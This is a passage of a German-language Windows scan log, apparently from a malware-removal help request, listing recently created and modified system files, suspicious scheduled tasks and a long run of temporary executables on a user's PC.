2016-03-21 23:23 - 2016-01-10 18:41 - 01707008 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll
2016-03-21 23:23 - 2016-01-10 18:31 - 01344512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comsvcs.dll
2016-03-21 23:23 - 2016-01-09 03:49 - 00218448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rsaenh.dll
2016-03-21 23:23 - 2016-01-09 03:49 - 00192120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rsaenh.dll
2016-03-21 23:23 - 2016-01-07 01:46 - 00148752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscapi.dll
2016-03-21 23:23 - 2016-01-07 01:45 - 00177712 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscapi.dll
2016-03-21 23:23 - 2016-01-06 18:47 - 00146944 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscsvc.dll
2016-03-21 23:23 - 2015-12-30 22:49 - 00470360 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netio.sys
2016-03-21 23:23 - 2015-12-20 16:57 - 00839168 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll
2016-03-21 23:23 - 2015-12-20 16:43 - 00696320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll
2016-03-21 23:23 - 2015-11-19 16:33 - 00994760 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase.dll
2016-03-21 23:23 - 2015-11-19 16:26 - 00922432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll
2016-03-21 23:13 - 2016-03-21 23:13 - 01530368 _____ C:\Users\Denny\Desktop\adwcleaner_5.105.exe
2016-03-21 22:54 - 2016-03-22 02:07 - 00000000 ____D C:\AdwCleaner
2016-03-21 22:27 - 2016-03-21 22:36 - 00000000 ____D C:\Users\Denny\Desktop\Pferd
2016-03-21 22:23 - 2016-03-21 22:23 - 00000000 ____D C:\WINDOWS\system32\diee
2016-03-21 18:50 - 2016-03-21 18:50 - 600300950 _____ C:\WINDOWS\MEMORY.DMP
2016-03-21 18:50 - 2016-03-21 18:50 - 00284928 _____ C:\WINDOWS\Minidump\032116-30421-01.dmp
2016-03-21 18:44 - 2016-01-15 18:56 - 02487296 _____ (Microsoft Corporation) C:\WINDOWS\system32\storagewmi.dll
2016-03-21 18:44 - 2016-01-15 18:45 - 01482240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\storagewmi.dll
2016-03-21 18:44 - 2016-01-05 17:00 - 00570880 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2016-03-21 18:44 - 2015-12-20 16:56 - 00616960 _____ (Microsoft Corporation) C:\WINDOWS\system32\msra.exe
2016-03-21 18:37 - 2016-03-21 18:37 - 00001198 _____ C:\Users\Public\Desktop\Avira Antivirus.lnk
2016-03-21 18:37 - 2016-03-21 18:37 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2016-03-21 18:24 - 2016-03-21 18:24 - 00000000 ____D C:\WINDOWS\system32\ebo
2016-03-21 18:16 - 2016-03-28 23:05 - 00000000 ____D C:\Users\Denny\AppData\Roaming\Leihjuef
2016-03-21 18:15 - 2016-03-21 18:15 - 00000000 ____D C:\Users\Denny\AppData\Local\app
2016-03-21 18:14 - 2016-03-21 18:43 - 00000000 ____D C:\Users\Denny\AppData\Roaming\Avira
2016-03-21 18:10 - 2016-03-21 18:10 - 00000000 ____D C:\WINDOWS\system32\oha
2016-03-21 18:07 - 2016-03-21 18:35 - 00000000 ____D C:\ProgramData\Avira
2016-03-21 18:07 - 2016-03-21 18:34 - 00137952 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avipbb.sys
2016-03-21 18:07 - 2016-03-21 18:34 - 00128664 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avgntflt.sys
2016-03-21 18:07 - 2016-03-21 18:34 - 00068936 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avnetflt.sys
2016-03-21 18:07 - 2016-03-21 18:34 - 00035488 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avkmgr.sys
2016-03-21 18:07 - 2016-03-21 18:07 - 00000000 ____D C:\Program Files (x86)\Avira
2016-03-21 17:38 - 2016-03-08 09:00 - 00829944 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2016-03-21 17:38 - 2016-03-08 09:00 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2016-03-21 17:33 - 2016-03-21 17:33 - 00000000 ____D C:\WINDOWS\system32\ahua
2016-03-21 16:28 - 2016-02-12 21:14 - 00136904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2016-03-21 16:28 - 2016-02-12 17:14 - 03708416 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-03-21 16:28 - 2016-02-12 16:55 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\WUSettingsProvider.dll
2016-03-21 16:28 - 2016-02-12 16:54 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuwebv.dll
2016-03-21 16:28 - 2016-02-12 16:54 - 00095744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
2016-03-21 16:28 - 2016-02-12 16:54 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapp.exe
2016-03-21 16:28 - 2016-02-12 16:51 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuwebv.dll
2016-03-21 16:28 - 2016-02-12 16:51 - 00081920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll
2016-03-21 16:28 - 2016-02-12 16:51 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapp.exe
2016-03-21 16:28 - 2016-02-12 16:48 - 02244096 _____ (Microsoft Corporation) C:\WINDOWS\system32\wucltux.dll
2016-03-21 16:28 - 2016-02-12 16:47 - 00897024 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2016-03-21 16:28 - 2016-02-12 16:46 - 00726528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2016-03-21 16:24 - 2016-02-08 23:05 - 20352512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-03-21 16:24 - 2016-02-08 22:34 - 02280448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-03-21 16:24 - 2016-02-08 22:29 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll
2016-03-21 16:24 - 2016-02-08 22:10 - 04611072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-03-21 16:24 - 2016-02-08 22:05 - 25816576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-03-21 16:24 - 2016-02-08 22:03 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2016-03-21 16:24 - 2016-02-08 22:02 - 13012480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-03-21 16:24 - 2016-02-08 22:02 - 00687104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2016-03-21 16:24 - 2016-02-08 22:01 - 02050560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2016-03-21 16:24 - 2016-02-08 21:43 - 02121216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-03-21 16:24 - 2016-02-08 20:27 - 02887680 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-03-21 16:24 - 2016-02-08 20:26 - 00571904 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2016-03-21 16:24 - 2016-02-08 20:16 - 06052352 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-03-21 16:24 - 2016-02-08 20:14 - 00108544 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll
2016-03-21 16:24 - 2016-02-08 20:13 - 00817664 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2016-03-21 16:24 - 2016-02-08 19:42 - 01032704 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
2016-03-21 16:24 - 2016-02-08 19:37 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2016-03-21 16:24 - 2016-02-08 19:34 - 00798720 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2016-03-21 16:24 - 2016-02-08 19:33 - 14613504 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-03-21 16:24 - 2016-02-08 19:33 - 02123264 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2016-03-21 16:24 - 2016-02-08 19:19 - 02597376 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-03-21 16:24 - 2016-02-08 19:15 - 02880000 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll
2016-03-21 16:24 - 2016-02-08 19:07 - 01546752 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-03-21 16:24 - 2016-02-08 18:55 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2016-03-21 16:23 - 2016-02-08 22:39 - 00496640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2016-03-21 16:23 - 2016-02-08 22:28 - 00663552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2016-03-21 16:23 - 2016-02-08 22:07 - 00880128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
2016-03-21 16:23 - 2016-02-08 21:39 - 01311744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-03-21 16:23 - 2016-02-08 21:38 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2016-03-21 16:23 - 2016-02-08 19:51 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2016-03-21 16:19 - 2016-02-11 16:21 - 00869576 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcr120_clr0400.dll
2016-03-21 16:19 - 2016-02-11 16:21 - 00678600 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcp120_clr0400.dll
2016-03-21 16:19 - 2016-02-11 16:20 - 00875720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcr120_clr0400.dll
2016-03-21 16:19 - 2016-02-11 16:20 - 00536776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcp120_clr0400.dll
2016-03-21 16:19 - 2016-02-05 16:59 - 07784960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2016-03-21 16:19 - 2016-02-05 16:55 - 05264384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2016-03-21 16:19 - 2016-02-05 16:48 - 07075840 _____ (Microsoft Corporation) C:\WINDOWS\system32\glcndFilter.dll
2016-03-21 16:19 - 2016-02-05 16:47 - 05268480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\glcndFilter.dll
2016-03-21 16:18 - 2016-02-03 22:37 - 01661576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2016-03-21 16:18 - 2016-02-03 22:36 - 01212248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2016-03-21 16:18 - 2016-02-03 17:09 - 00086016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2016-03-21 16:18 - 2016-02-03 17:00 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
2016-03-21 16:18 - 2016-02-03 17:00 - 00077824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
2016-03-21 16:13 - 2016-02-06 20:08 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\seclogon.dll
2016-03-21 16:13 - 2016-02-05 21:07 - 00292696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMASF.DLL
2016-03-21 16:13 - 2016-02-05 21:07 - 00243032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMASF.DLL
2016-03-21 16:13 - 2016-02-05 17:03 - 15432704 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll
2016-03-21 16:13 - 2016-02-05 17:00 - 13318144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll
2016-03-21 16:13 - 2016-02-04 20:18 - 04174336 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2016-03-21 16:13 - 2016-02-04 20:18 - 00358912 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2016-03-21 16:13 - 2016-02-04 20:12 - 00044032 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2016-03-21 16:13 - 2016-02-04 19:44 - 00301568 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2016-03-21 16:13 - 2016-02-04 19:39 - 00035840 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2016-03-21 16:13 - 2016-02-04 19:24 - 00603648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfds.dll
2016-03-21 16:13 - 2016-02-04 19:02 - 00483328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfds.dll
2016-03-21 16:13 - 2016-01-31 21:16 - 00148832 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBSTOR.SYS
2016-03-09 18:41 - 2016-03-09 18:41 - 00000000 ____D C:\WINDOWS\system32\wof
2016-03-09 18:34 - 2016-03-09 18:34 - 00003336 _____ C:\WINDOWS\System32\Tasks\Foxvohji
2016-03-09 09:51 - 2016-03-09 09:51 - 00000000 ____D C:\Users\Denny\AppData\Local\VirtualStore
2016-03-09 09:38 - 2016-03-09 09:38 - 00000000 ____D C:\WINDOWS\system32\wyfw
2016-03-09 02:47 - 2016-03-09 02:47 - 00000000 ____D C:\WINDOWS\system32\tob
2016-03-09 02:47 - 2016-03-09 02:47 - 00000000 ____D C:\WINDOWS\system32\riv
2016-03-09 02:47 - 2016-03-09 02:47 - 00000000 ____D C:\WINDOWS\system32\baf
2016-03-08 14:19 - 2016-03-21 15:58 - 00000000 ____D C:\Users\Denny\Desktop\bewerbung philipp
2016-03-08 14:00 - 2016-03-08 14:00 - 00137615 _____ C:\Users\Denny\Desktop\EPSON002.png.PDF
2016-03-08 13:19 - 2016-03-08 13:19 - 05404312 _____ (Avira Operations GmbH & Co. KG) C:\Users\Denny\Downloads\avira_de_av_56deb4d03eff9__ws.exe
2016-03-08 12:16 - 2016-03-08 12:16 - 00000000 ____D C:\Program Files (x86)\DATA BECKER
2016-03-08 12:16 - 1998-11-17 14:44 - 00328704 _____ (InstallShield Software Corporation ) C:\WINDOWS\IsUn0407.exe
2016-03-08 12:13 - 2016-03-08 12:13 - 01470472 _____ C:\Users\Denny\Downloads\PopUp Banner Blocker - CHIP-Installer.exe
2016-03-08 12:06 - 2016-03-09 10:16 - 00001231 _____ C:\Users\Denny\Desktop\Continue Last version Installation.lnk
2016-03-08 11:46 - 2016-03-08 11:59 - 05600464 _____ (Piriform Ltd) C:\Users\Denny\Downloads\ccsetup515_slim(1).exe
2016-03-08 11:44 - 2016-03-08 11:46 - 05600464 _____ (Piriform Ltd) C:\Users\Denny\Downloads\ccsetup515_slim.exe
2016-03-07 22:16 - 2016-03-07 22:16 - 00000000 ____D C:\Users\Denny\AppData\Local\3810282D-6C19-47B0-8283-5C6C29A7E108
2016-03-07 21:40 - 2016-03-07 21:40 - 00003338 _____ C:\WINDOWS\System32\Tasks\Conbyg
2016-03-05 22:21 - 2016-03-05 22:21 - 00020512 _____ C:\WINDOWS\System32\Tasks\{862ADFBD-2F9C-1196-63CC-68B979092056}
2016-03-05 22:21 - 2016-03-05 22:21 - 00003728 _____ C:\WINDOWS\System32\Tasks\{55AB0601-0B56-F46D-28BD-EBA44DF6A920}
==================== Ein Monat: Geänderte Dateien und Ordner ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2016-03-29 12:51 - 2012-07-26 09:59 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-03-29 12:50 - 2015-11-01 22:59 - 00003596 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1569062512-718196537-2772323438-1001
2016-03-29 12:48 - 2015-08-11 08:03 - 00000000 ___SD C:\WINDOWS\SysWOW64\GWX
2016-03-29 12:48 - 2015-08-11 08:03 - 00000000 ___SD C:\WINDOWS\system32\GWX
2016-03-29 12:47 - 2013-10-24 13:02 - 00000000 __RDO C:\Users\Denny\SkyDrive
2016-03-29 00:04 - 2016-02-05 00:38 - 00000884 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-03-28 23:29 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-03-28 23:13 - 2013-09-07 18:10 - 00000000 ____D C:\WINDOWS\System32\Tasks\WPD
2016-03-28 23:10 - 2014-07-31 22:27 - 00000000 ____D C:\Users\Administrator
2016-03-28 23:00 - 2013-09-30 06:14 - 01776918 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-03-28 23:00 - 2013-09-30 05:56 - 00765582 _____ C:\WINDOWS\system32\perfh007.dat
2016-03-28 23:00 - 2013-09-30 05:56 - 00159366 _____ C:\WINDOWS\system32\perfc007.dat
2016-03-28 23:00 - 2013-08-22 15:36 - 00000000 ____D C:\WINDOWS\Inf
2016-03-28 22:52 - 2013-08-22 16:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-03-22 03:13 - 2014-12-25 19:50 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-03-22 03:12 - 2013-09-09 14:33 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-03-22 03:08 - 2013-09-09 14:33 - 143659408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-03-22 00:21 - 2014-05-14 21:48 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-03-21 23:32 - 2013-08-22 17:36 - 00000000 ___HD C:\Program Files\WindowsApps
2016-03-21 23:18 - 2015-11-01 23:05 - 00001144 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\zc1h3r7o5m4e.lnk
2016-03-21 23:18 - 2014-03-22 21:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
2016-03-21 23:15 - 2013-08-22 17:36 - 00000000 ____D C:\Program Files\Common Files\System
2016-03-21 22:57 - 2016-01-28 10:48 - 00000000 ____D C:\Users\Denny\AppData\Local\CrashDumps
2016-03-21 22:22 - 2015-06-01 20:54 - 00000000 ____D C:\Program Files (x86)\Color Icons for Gmail
2016-03-21 22:22 - 2014-07-31 22:32 - 00000000 ____D C:\Program Files (x86)\video MediaPlay-Air
2016-03-21 22:22 - 2014-07-31 22:28 - 00000000 ____D C:\Program Files (x86)\HQPureQualV1.8
2016-03-21 18:50 - 2015-10-26 21:57 - 00000000 ____D C:\WINDOWS\Minidump
2016-03-21 18:16 - 2016-01-28 10:50 - 00000000 ____D C:\Users\Denny\AppData\Local\Tempfolder
2016-03-21 18:11 - 2013-08-22 15:25 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2016-03-21 17:36 - 2013-08-22 16:44 - 00590976 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-03-21 17:17 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\FxsTmp
2016-03-21 16:11 - 2016-01-18 20:30 - 00718336 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2016-03-21 16:11 - 2016-01-18 20:30 - 00372224 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2016-03-11 09:50 - 2013-09-15 13:17 - 00000000 ____D C:\Users\Denny\Documents\Rechnungen DS-KFZ
2016-03-09 18:38 - 2013-08-22 17:36 - 00000000 ___RD C:\WINDOWS\ToastData
2016-03-09 09:37 - 2013-09-30 05:59 - 00000000 ____D C:\Program Files\Windows Journal
2016-03-08 12:35 - 2016-02-05 00:36 - 00000000 ____D C:\Users\Denny\AppData\Local\Chromium
2016-03-08 12:08 - 2013-11-10 15:12 - 00267264 ___SH C:\Users\Denny\Desktop\Thumbs.db
2016-03-08 12:04 - 2013-10-24 13:25 - 00000000 ___DC C:\WINDOWS\Panther
2016-03-07 22:12 - 2016-02-19 13:56 - 00001656 _____ C:\Users\Denny\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2016-03-07 21:43 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\NDF
==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======
2013-06-29 02:24 - 2013-06-29 02:24 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2014-03-28 08:18 - 2015-07-29 23:04 - 0000000 ____H () C:\ProgramData\PKP_DLes.DAT
2014-03-28 08:18 - 2015-07-29 23:04 - 0000000 ____H () C:\ProgramData\PKP_DLet.DAT
2014-03-28 08:18 - 2015-07-29 23:04 - 0000000 ____H () C:\ProgramData\PKP_DLev.DAT
Einige Dateien in TEMP:
====================
C:\Users\Administrator.Schneider\AppData\Local\Temp\avgnt.exe
C:\Users\Denny\AppData\Local\Temp\112.tmp.exe
C:\Users\Denny\AppData\Local\Temp\126.tmp.exe
C:\Users\Denny\AppData\Local\Temp\127.tmp.exe
C:\Users\Denny\AppData\Local\Temp\1BFC.tmp.exe
C:\Users\Denny\AppData\Local\Temp\1BFD.tmp.exe
C:\Users\Denny\AppData\Local\Temp\1BFE.tmp.exe
C:\Users\Denny\AppData\Local\Temp\1BFF.tmp.exe
C:\Users\Denny\AppData\Local\Temp\1C15.tmp.exe
C:\Users\Denny\AppData\Local\Temp\2180.tmp.exe
C:\Users\Denny\AppData\Local\Temp\2181.tmp.exe
C:\Users\Denny\AppData\Local\Temp\23EB.tmp.exe
C:\Users\Denny\AppData\Local\Temp\2518.tmp.exe
C:\Users\Denny\AppData\Local\Temp\256E.tmp.exe
C:\Users\Denny\AppData\Local\Temp\26FC.tmp.exe
C:\Users\Denny\AppData\Local\Temp\271A.tmp.exe
C:\Users\Denny\AppData\Local\Temp\271B.tmp.exe
C:\Users\Denny\AppData\Local\Temp\271C.tmp.exe
C:\Users\Denny\AppData\Local\Temp\2737.tmp.exe
C:\Users\Denny\AppData\Local\Temp\2764.tmp.exe
C:\Users\Denny\AppData\Local\Temp\2765.tmp.exe
C:\Users\Denny\AppData\Local\Temp\2766.tmp.exe
C:\Users\Denny\AppData\Local\Temp\277A.tmp.exe
C:\Users\Denny\AppData\Local\Temp\277B.tmp.exe
C:\Users\Denny\AppData\Local\Temp\2790.tmp.exe
C:\Users\Denny\AppData\Local\Temp\2791.tmp.exe
C:\Users\Denny\AppData\Local\Temp\27A6.tmp.exe
C:\Users\Denny\AppData\Local\Temp\27A7.tmp.exe
C:\Users\Denny\AppData\Local\Temp\27B0.tmp.exe
C:\Users\Denny\AppData\Local\Temp\27BE.tmp.exe
C:\Users\Denny\AppData\Local\Temp\27D5.tmp.exe
C:\Users\Denny\AppData\Local\Temp\27DA.tmp.exe
C:\Users\Denny\AppData\Local\Temp\27DB.tmp.exe
C:\Users\Denny\AppData\Local\Temp\2824.tmp.exe
C:\Users\Denny\AppData\Local\Temp\2825.tmp.exe
C:\Users\Denny\AppData\Local\Temp\283A.tmp.exe
C:\Users\Denny\AppData\Local\Temp\283B.tmp.exe
C:\Users\Denny\AppData\Local\Temp\2918.tmp.exe
C:\Users\Denny\AppData\Local\Temp\2919.tmp.exe
C:\Users\Denny\AppData\Local\Temp\291A.tmp.exe
C:\Users\Denny\AppData\Local\Temp\2930.tmp.exe
C:\Users\Denny\AppData\Local\Temp\295C.tmp.exe
C:\Users\Denny\AppData\Local\Temp\29AF.tmp.exe
C:\Users\Denny\AppData\Local\Temp\2A0C.tmp.exe
C:\Users\Denny\AppData\Local\Temp\2A81.tmp.exe
C:\Users\Denny\AppData\Local\Temp\2A82.tmp.exe
C:\Users\Denny\AppData\Local\Temp\336E.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3399.tmp.exe
C:\Users\Denny\AppData\Local\Temp\339A.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3404.tmp.exe
C:\Users\Denny\AppData\Local\Temp\342E.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3447.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3448.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3449.tmp.exe
C:\Users\Denny\AppData\Local\Temp\356F.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35B9.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35CB.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35CC.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35CD.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35CE.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35CF.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35D0.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35D1.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35D2.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35D3.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35D4.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35E2.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35E3.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35E4.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35E5.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35E6.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35E7.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35E8.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35F8.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35FD.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35FE.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35FF.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3612.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3613.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3619.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3628.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3629.tmp.exe
C:\Users\Denny\AppData\Local\Temp\362C.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3640.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3641.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3655.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3656.tmp.exe
C:\Users\Denny\AppData\Local\Temp\366D.tmp.exe
C:\Users\Denny\AppData\Local\Temp\366E.tmp.exe
C:\Users\Denny\AppData\Local\Temp\366F.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3670.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3671.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3681.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3682.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3683.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3684.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3685.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3686.tmp.exe
C:\Users\Denny\AppData\Local\Temp\36AD.tmp.exe
C:\Users\Denny\AppData\Local\Temp\36DE.tmp.exe
C:\Users\Denny\AppData\Local\Temp\36F4.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3782.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3783.tmp.exe
C:\Users\Denny\AppData\Local\Temp\37BA.tmp.exe
C:\Users\Denny\AppData\Local\Temp\37BB.tmp.exe
C:\Users\Denny\AppData\Local\Temp\37BC.tmp.exe
C:\Users\Denny\AppData\Local\Temp\380C.tmp.exe
C:\Users\Denny\AppData\Local\Temp\380D.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3822.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3908.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3963.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3A50.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3F35.tmp.exe
C:\Users\Denny\AppData\Local\Temp\4038.tmp.exe
C:\Users\Denny\AppData\Local\Temp\4040.tmp.exe
C:\Users\Denny\AppData\Local\Temp\4056.tmp.exe
C:\Users\Denny\AppData\Local\Temp\4080.tmp.exe
C:\Users\Denny\AppData\Local\Temp\4081.tmp.exe
C:\Users\Denny\AppData\Local\Temp\44E0.tmp.exe
C:\Users\Denny\AppData\Local\Temp\4523.tmp.exe
C:\Users\Denny\AppData\Local\Temp\4524.tmp.exe
C:\Users\Denny\AppData\Local\Temp\4525.tmp.exe
C:\Users\Denny\AppData\Local\Temp\55DF.tmp.exe
C:\Users\Denny\AppData\Local\Temp\55F4.tmp.exe
C:\Users\Denny\AppData\Local\Temp\55F5.tmp.exe
C:\Users\Denny\AppData\Local\Temp\55F6.tmp.exe
C:\Users\Denny\AppData\Local\Temp\55F7.tmp.exe
C:\Users\Denny\AppData\Local\Temp\560B.tmp.exe
C:\Users\Denny\AppData\Local\Temp\560C.tmp.exe
